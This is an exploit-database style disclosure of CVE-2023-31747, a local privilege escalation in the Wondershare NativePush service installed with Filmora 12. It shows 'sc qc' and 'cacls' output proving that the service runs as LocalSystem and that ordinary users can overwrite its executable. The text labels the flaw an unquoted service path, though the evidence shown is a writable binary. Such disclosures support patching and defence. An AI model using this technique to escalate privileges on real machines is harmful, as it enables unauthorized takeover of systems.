# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation # Date: 20 May 2023 # Exploit Author: Thurein Soe # Vendor Homepage: https://filmora.wondershare.com # Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE # Version: Filmora 12 ( Build 1.0.0.7) # Tested on: Windows 10 (Version 10.0.19045.2965) # CVE : CVE-2023-31747 Vulnerability description: Filmora is a professional video editing software. Wondershare NativePush Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The service name "NativePushService" was vulnerable to unquoted service paths vulnerability which led to full local privilege escalation in the affected window operating system as the service "NativePushService" was running with system privilege that the local user has write access to the directory where the service is located. Effectively, the local user is able to elevate to local admin upon successfully replacing the affected executable. C:\sc qc NativePushService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: NativePushService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Wondershare Native Push Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe BUILTIN\Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F HNINKAYTHAYAR\HninKayThayar:(ID)F